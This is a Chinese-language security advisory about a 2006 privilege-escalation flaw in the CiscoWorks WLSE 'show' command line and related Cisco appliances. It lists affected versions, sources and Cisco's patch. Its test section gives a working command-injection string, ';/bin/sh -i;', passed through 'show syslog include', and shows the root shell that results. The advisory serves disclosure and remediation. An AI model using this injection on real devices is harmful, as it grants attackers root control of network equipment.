发布日期：2006-04-19
更新日期：2006-04-19

受影响系统：

Cisco Hosting Solution Engine
Cisco WLSE < 2.13
Cisco User Registration Tool
Cisco Ethernet Subscriber Solution Engine
Cisco Works2000 Service Management Solution

不受影响系统：

Cisco WLSE 2.13

描述：

---

BUGTRAQ  ID: 17609

CiscoWorks WLSE是集中的系统级应用程序,用于管理和控制整个自治Cisco WLAN基础架构。

CiscoWorks WLSE的“show”命令行接口实现上存在漏洞，远程攻击者可能利用此漏洞提升自己在设备中的权限。

已经获得对命令行接口认证访问的攻击者可以利用这个漏洞摆脱shell，以root权限执行任意命令，包括/bin/sh。

<*来源：Adam Pointon （http://www.assurance.com.au/）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=114546671802503&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=114546635528611&w=2
        http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

管理员通过Telnet或SSH登录到Cisco WLSE。

  admin@wlse: show version
   (C) Copyright 2005 by Cisco Systems Inc.
   WLSE 1130 Release 2.11FCS Thu Apr 14 00:09:56 UTC 2005
   Device Limit = 2550
   Build Version (67) Tue Mar 15 18:13:02 UTC 2005
   Uptime: 2 days 3 hours 32 mins
   Linux version 2.4.28-5_WLSEsmp (root@app20.cisco.com) (gcc version 2.96 20000731
   (Red Hat Linux 7.3 2.96-113)) #1 SMP Mon Jan 31 16:04:20 PST 2005
   1130
   Intel(R) CPU at  3065.897 Mhz with 3105924K bytes of memory.

  admin@wlse: show syslog include ";/bin/sh -i;"

  sh-2.05a# id
   uid=0(root) gid=502(admin) groups=502(admin),500(enable)

这时管理员获得了对基于Linux的Cisco设备的root级别访问。

建议：

---

厂商补丁：

Cisco
-----
Cisco已经为此发布了一个安全公告（cisco-sa-20060419-wlse）以及相应补丁:
cisco-sa-20060419-wlse：Multiple Vulnerabilities in the WLSE Appliance
链接：http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml

补丁下载：
http://www.cisco.com/cgi-bin/tablebuild.pl/wlan-sol-eng

浏览次数：4658
严重程度：0（网友投票）